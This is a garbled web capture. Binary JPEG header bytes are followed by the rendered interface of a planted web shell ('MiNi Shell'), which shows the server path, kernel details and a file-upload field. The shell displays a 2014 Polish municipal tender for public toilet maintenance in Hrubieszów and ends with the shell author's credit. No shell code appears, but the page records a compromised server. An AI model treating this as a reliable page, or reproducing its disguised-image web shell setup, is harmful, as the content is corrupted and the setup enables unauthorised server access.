JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140212/49494-N-2014.html

<p class="kh_header"><b>Hrubieszów: Świadczenie usługi w zakresie bieżącego utrzymania  szaletów miejskich
 w Hrubieszowie</b><br>
<b>Numer ogłoszenia: 49494 - 2014; data zamieszczenia: 12.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Hrubieszów , ul. mjr H. Dobrzańskiego "Hubala" 1, 22-500 Hrubieszów, woj. lubelskie, tel. 084 6962380 w. 54, faks 084 6962380.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.hrubieszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi w zakresie bieżącego utrzymania  szaletów miejskich
 w Hrubieszowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług w zakresie bieżącego utrzymania szaletów miejskich w Hrubieszowie okresie od dnia podpisania umowy do dnia  28.02.2015r.  jn:
1)	  Szalet miejski przy ul. Targowej,
2)	  Szalet miejski przy ul. 3-go Maja w Parku Solidarności, 
3)	  Szalet miejski przy ulicy Kolejowej 3 wraz z utrzymaniem czystości                           i utrzymaniem zimowym na terenie targowiska miejskiego
          Wyrys z ewidencji gruntów, budynków i terenu stanowi Załącznik Nr 8 do SIWZ.  
2.	Zakres usługi obejmuje wykonywanie niżej wymienionych obowiązków: 
Szalet miejski przy ul. Targowej,
1)	Otwieranie szaletu w godzinach 8:00 - 16:00 od poniedziałku do soboty wraz              z pobieraniem opłaty za korzystanie z szaletu.
2)	Wydłużanie godzin otwarcia szaletu na uzasadnione żądanie Zamawiającego bez naliczania  dodatkowych opłat.
3)	Utrzymanie zimowe przekazanego terenu poprzez:
a)	usuwanie śniegu, lodu, błota, sopli, 
b)	likwidacja śliskości chodnika prowadzącego do budynku przez posypywanie   piaskiem, 
4)	Sprawowanie bieżącego nadzoru nad powierzonym mieniem Miasta poprzez sprawdzenia prawidłowego działania wszystkich urządzeń sanitarnych                         i elektrycznych zainstalowanych w szalecie oraz niezwłoczne poinformowanie Zamawiającego o wystąpieniu ewentualnych uszkodzeń. 
5)	Powierzchniowe oczyszczanie szaletu poprzez:  
a)	zamiatanie i mycie na mokro powierzchni płaskich, 
b)	sprzątanie i dezynfekowanie urządzeń sanitarnych (umywalki, pisuary, sedesy),
c)	czyszczenie baterii umywalkowych, 
d)	opróżnianie śmietników. 
e)	zgłaszania do Komendy Miejskiej Policji lub Straży Miejskiej dewastacji szaletu oraz niezwłoczne poinformowanie Zamawiającego o podjętej decyzji przez ww. organy. 
Szalet miejski przy ul. 3-go Maja w Parku Solidarności
1)	Otwieranie szaletu w godzinach 8:00 - 16:00  od poniedziałku do soboty oraz           w inne dni związane z uroczystościami przed Hrubieszowskim Domem Kultury oraz w Parku Solidarności w odpowiednich godzinach - po uzgodnieniu                         z Zamawiającym wraz z pobieraniem opłaty za korzystanie z szaletu.
2)	Wydłużanie godzin otwarcia szaletu na uzasadnione żądanie Zamawiającego bez naliczania  dodatkowych opłat.
3)	Utrzymanie czystości oraz utrzymanie zimowe przekazanego terenu poprzez:
a)	usuwanie śniegu, lodu, błota, sopli, 
b)	likwidacja śliskości chodnika prowadzącego do budynku przez posypywanie   piaskiem, 
4)	Sprawowanie bieżącego nadzoru nad powierzonym mieniem Miasta poprzez sprawdzenia prawidłowego działania wszystkich urządzeń sanitarnych                      i elektrycznych zainstalowanych w szalecie oraz niezwłoczne poinformowanie Zamawiającego o wystąpieniu ewentualnych uszkodzeń. 
5)	Powierzchniowe oczyszczanie szaletu poprzez:  
a)	zamiatanie i mycie na mokro powierzchni płaskich, 
b)	sprzątanie i dezynfekowanie urządzeń sanitarnych (umywalki, pisuary, sedesy),
c)	czyszczenie baterii umywalkowych, 
d)	opróżnianie śmietników. 
e)	Zgłaszania do Komendy Miejskiej Policji lub Straży Miejskiej dewastacji szaletu oraz niezwłoczne poinformowanie Zamawiającego o podjętej decyzji przez ww. organy. 
W związku z wykonaniem remontu szaletu w ramach projektu pn Rewitalizacja Centrum Hrubieszowa poprzez porządkowanie przestrzeni publicznej Śródmieścia oraz renowacja zdegradowanej substancji mieszkaniowej z otoczeniem przekazany obiekt objęty jest gwarancją należytego wykonania umowy przez Wykonawcę robót budowlanych. W związku z tym, na terenie ww. obiektu nie można dokonywać żadnych zmian, a wszelkie usterki wynikające z użytkowania obiektu zgłaszać bezpośrednio do Zamawiającego.

Szalet miejski przy ulicy Kolejowej 3 wraz z utrzymaniem czystości                         i utrzymaniem zimowym na terenie targowiska miejskiego
1)	Ustalenia godzin otwarcia i zamknięcia szaletów w dni targowe tj. we wtorek            i piątek w godz. 6:30 - 14:30 oraz w inne dni związane z uroczystościami na cmentarzu grzebalnym przy ul. Kolejowej w odpowiednich godzinach - po uzgodnieniu  z  Zamawiającym. 
2)	Wydłużanie godzin otwarcia szaletu na uzasadnione żądanie Zamawiającego bez naliczania  dodatkowych opłat.
3)	Utrzymanie czystości wraz z utrzymaniem zimowym na terenie targowiska miejskiego przy ul. Kolejowej 3c o powierzchni 4.180 m2. w zakresie:
a)	usuwania nieczystości z dojścia do szaletu oraz terenu targowiska miejskiego. 
b)	usuwanie śniegu, lodu, błota, sopli, likwidacja śliskości dojścia prowadzącego do szaletu oraz na terenie targowiska miejskiego przez posypywanie piaskiem.
4)	Sterowanie oświetleniem terenu w dni targowe oraz inne dni związane                          z uroczystościami na cmentarzu grzebalnym przy ul. Kolejowej,                          w odpowiednich godzinach - po uzgodnieniu z Zamawiającym.	
5)	Sprawowanie bieżącego nadzoru nad powierzonym mieniem Miasta poprzez sprawdzenia prawidłowego działania wszystkich urządzeń sanitarnych                       i elektrycznych zainstalowanych w szalecie oraz niezwłoczne poinformowanie Zamawiającego o wystąpieniu ewentualnych uszkodzeń. 
6)	Powierzchniowe oczyszczanie szaletu poprzez:  
a)	zamiatanie i mycie na mokro powierzchni płaskich, 
b)	sprzątanie i dezynfekowanie urządzeń sanitarnych (umywalki, pisuary, sedesy),
c)	czyszczenie baterii umywalkowych, 
d)	opróżnianie śmietników. 
7)	Zgłaszania do Komendy Miejskiej Policji lub Straży Miejskiej dewastacji szaletu oraz niezwłoczne poinformowanie Zamawiającego o podjętej decyzji przez ww. organy. 
3.	Wykonawca zobowiązuje się do wykonania prac będących przedmiotem zamówienia zgodnie z aktualnym poziomem wiedzy technicznej, obowiązującymi w tym zakresie przepisami i należytą starannością. 
4.	Wykonawca w całym okresie realizacji umowy ma obowiązek posiadania ważnej polisy ubezpieczenia od odpowiedzialności cywilnej, w zakresie prowadzonej działalności związanej z przedmiotem umowy.
5.	W przypadku posiadania polisy ubezpieczenia od odpowiedzialności cywilnej, której okres obowiązywania nie obejmuje całego okresu, na jaki zawarta jest niniejsza umowa, Wykonawca zobowiązany jest do przedłużenia ubezpieczenia (przedłużenia dotychczasowej polisy bądź zawarcie nowej) oraz przedstawienie wznowionej polisy Zamawiającemu nie później niż na 7 dni przed upływem terminu obowiązywania dotychczasowej polisy.  
6.	Wykonawca ponosi wszelką odpowiedzialność prawną wobec osób trzecich za ewentualne skutki nieszczęśliwych wypadków powstałych przy wykonywaniu przedmiotu zamówienia oraz za powierzone mienie.  
7.	Wykonawca ponadto zobowiązany jest :
1)	utrzymywać czystość i porządek na terenie obiektu przestrzegając wymagań określonych w regulaminie utrzymania czystości i porządku na terenie Miasta Hrubieszowa  oraz w innych  regulaminach, 
2)	codziennie przeprowadzać przeglądy i kontrole stanu technicznego urządzeń sanitarnych i technicznych znajdujących się w szalecie. 
3)	dokonywać na bieżąco konserwacji urządzeń technicznych znajdujących się                  w szalecie, w przypadku ujawnienia poważnych usterek powodujących zagrożenie bezpieczeństwa zobowiązany jest natychmiast usunąć z przekazanego terenu (zdemontować część stanowiącą zagrożenie), pozostałą część odpowiednio zabezpieczyć i bezzwłocznie zawiadomić Zamawiającego o podjętych działaniach, 
2)	niezwłocznie informować organy ścigania o fakcie usunięcia lub uszkodzenia urządzeń technicznych znajdujących się w szalecie przez osoby inne nie będące Wykonawcą, w przeciwnym razie odpowiedzialność za te czyny ponosi Wykonawca, 
3)	do pobierania opłat za korzystanie z szaletu. Zebrana opłata za korzystanie                       z szaletu miejskiego w całości stanowi dochód Wykonawcy, który został uwzględniony przy kalkulacji ceny w składanej ofercie na usługę utrzymania szaletu miejskiego. 
4)	do zawarcia we własnym imieniu i na własny rachunek umów: 
a)	na dostawę energii elektrycznej do szaletu,
b)	na odbiór odpadów komunalnych, 
c)	na dostawę wody i odbiór  nieczystości ciekłych z szaletu.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.60.00.00-3, 50.87.00.00-4, 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada niezbędną wiedzę i doświadczenie, jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykaże się wykonaniem - co najmniej jednej usługi w zakresie całorocznego utrzymania szaletów tj. przez okres ciągły 12 miesięcy oraz załączy dowody określające, czy usługi te zostały wykonane lub są wykonywane należycie. Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia.
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty, stanowiący załącznik nr 1  do  SIWZ
2.	W przypadku udziału podwykonawców - załącznik nr 3 do SIWZ
3.	Pisemne zobowiązanie innych  podmiotów do oddania wykonawcy  do dyspozycji  
     niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia        - jeżeli   dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Dopuszcza się wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienie ani na wynik postępowania o udzielenie zamówienia  publicznego.
2.	Z Wykonawcą, którego oferta zostanie uznana przez Zamawiającego za ofertę najkorzystniejszą, zostanie podpisana umowa. Projekt umowy stanowi Załącznik nr 2 do SIWZ
3.	Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy             w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy       w przypadku wystąpienia okoliczności: 
a)	gdy konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, 
b)	gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie, mającym wpływ na realizację przedmiotu umowy, 
c)	gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy,  w szczególności zmiana terminu realizacji zamówienia, 
4.	Wszelkie zmiany warunków umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> umhrubieszow.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta                       w Hrubieszowie - Wydział Gospodarki Mieniem Komunalnym i Ochrony Środowiska  ul. 3-go Maja 15 tel. 084 6962380 w. 56..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2014 godzina 10:00, miejsce: Sekretariat Gmina Miejska Hrubieszów ul. Mjr H. Dobrzańskiego Hubala 1,  22-500 Hrubieszów..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com